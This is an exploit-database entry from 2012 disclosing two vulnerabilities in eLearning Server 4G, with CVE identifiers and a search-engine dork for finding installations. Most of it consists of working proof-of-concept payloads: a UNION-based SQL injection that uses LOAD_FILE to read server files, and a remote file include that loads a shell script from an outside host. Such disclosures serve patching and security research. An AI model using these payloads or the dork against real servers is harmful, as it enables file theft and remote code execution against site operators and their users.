eLearning server 4g - Multiple Vulnerabilities

Author: Andrey Komarov
type: webapps
platform: php
port: 
date_added: 2012-05-10 
date_updated: 2012-05-10 
verified: 0 
codes: OSVDB-81831;OSVDB-81830;CVE-2012-2924;CVE-2012-2923 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: eLearning Server Multiple Remote Vulnerabilities
# Google Dork: intitle:"eLearning Server"
# Date: 10.05.2012
# Author: Eugene Salov, Andrey Komarov (Group-IB, http://group-ib.ru)
# Software Link: http://www.hypermethod.ru/
# Version: 4G
# Tested on: Microsoft Windows

news.php4 "nid" SQL injection:
POC:
/news.php4?nid=-12'+union+select+1,2,LOAD_FILE('C:\\Program%20Files\\Hypermethod\\eLearningServer\\index.php'),4,5,6,7,8,9,10,11/*

admin/setup.inc.php Remote file Include
POC: /admin/setup.inc.php?path=http://group-ib.ru/shell.txt?